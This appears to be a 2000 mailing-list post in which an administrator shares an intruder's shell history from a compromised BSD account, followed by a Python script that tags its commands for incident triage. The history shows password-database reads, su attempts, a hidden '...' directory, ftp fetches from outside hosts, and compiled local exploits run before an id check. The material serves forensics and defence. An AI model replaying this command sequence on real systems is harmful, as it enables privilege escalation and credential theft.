From: "Gerald T. Freymann"
To: "Questions"
Subject: Hacker history file - OUCH
Date: Mon, 18 Dec 2000 15:06:32 -0500

Seems we have an intruder on one of our boxes... the .history file from the
troubled account follows:

cd bnc
ls
./bash
who
cd /etc
more passwd
ps -l
ls -l
more pwd.db
more hosts
pico adduser.conf.bak
pico group
su user
pico group.bak
pico ftpuser O
pico ftpusers
su toor
su operator
id
pico spwd.db
su wheel
pico passwd
cd /var/tmp
ls -a
cd ...
ls -a
cd ..
ls -l
ls -al
cd ...
ftp copper.he.net
chmod u+x xcon
./xcon
id
rm *
ls
who
cd /var/tmp
ls -a
ls -al
cd ...
ls -a
ftp cih.edu.mx
ls
cc bsd1 bsd-cron.c
cc -o bsd1 bsd-cron.c
./bsd1
id
cc -o bsd2 bsd2.c
./bsd2
id
ls
ftp cih.edu.mx
./bsd
sh ./bsd.sh
chmod u+x bsd.sh
./bsd.sh
/tmp/sh
id
ls
cc -o bsdsmail bsdsmail.c
./bsdsmail
ls -a
pico hack
ls
pico user.inf
ls
id
rm *
exit

Anybody recognize what the intruder has set up?

-Gerry
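A first-pass triage of a shell history like the one in this message, added here as an example and not part of the original post: it tags commands that read account databases, fetch files, compile or run local binaries, check identity, or delete files, so a responder can build a timeline. The rule names and patterns are illustrative assumptions, and the sample is an excerpt of the posted history split one command per line.

```python
import re

# Excerpt of the history quoted in the post, in its original order. The
# one-command-per-line split is an assumption (the archive ran them together).
HISTORY = """\
more passwd
more pwd.db
su toor
pico spwd.db
cd /var/tmp
cd ...
ftp copper.he.net
chmod u+x xcon
./xcon
id
rm *
ftp cih.edu.mx
cc -o bsd1 bsd-cron.c
./bsd1
id
"""

# Illustrative triage rules (assumed for this example, not a standard rule set).
VIEW = r"^(more|cat|less|pico|vi)\s+(\S*/)?"
RULES = [
    ("account-db", re.compile(VIEW + r"(master\.passwd|passwd|s?pwd\.db|group)(\.bak)?$")),
    ("su-attempt", re.compile(r"^su(\s|$)")),
    ("hidden-dir", re.compile(r"^cd\s+(\S*/)?\.\.\.+$")),  # "..." hides next to ".."
    ("fetch",      re.compile(r"^(ftp|fetch|wget)\s+\S+")),
    ("compile",    re.compile(r"^(cc|gcc)\s")),
    ("run-local",  re.compile(r"^\./\S+")),
    ("priv-check", re.compile(r"^(id|whoami)$")),
    ("cleanup",    re.compile(r"^rm\s+(-\S+\s+)*\*$")),
]

def triage(history):
    """Return [(line_no, tag, command)] for each command matched by a rule."""
    hits = []
    for n, cmd in enumerate(history.splitlines(), 1):
        cmd = cmd.strip()
        for tag, rx in RULES:
            if rx.search(cmd):
                hits.append((n, tag, cmd))
                break  # first matching rule wins
    return hits

def exec_then_id(hits):
    """Local programs whose very next command was an identity check."""
    return [a[2] for a, b in zip(hits, hits[1:])
            if (a[1], b[1]) == ("run-local", "priv-check") and b[0] == a[0] + 1]
```

The binaries returned by `exec_then_id(triage(HISTORY))` are the ones to recover and examine first, together with the files and hosts named by the `fetch` and `compile` hits.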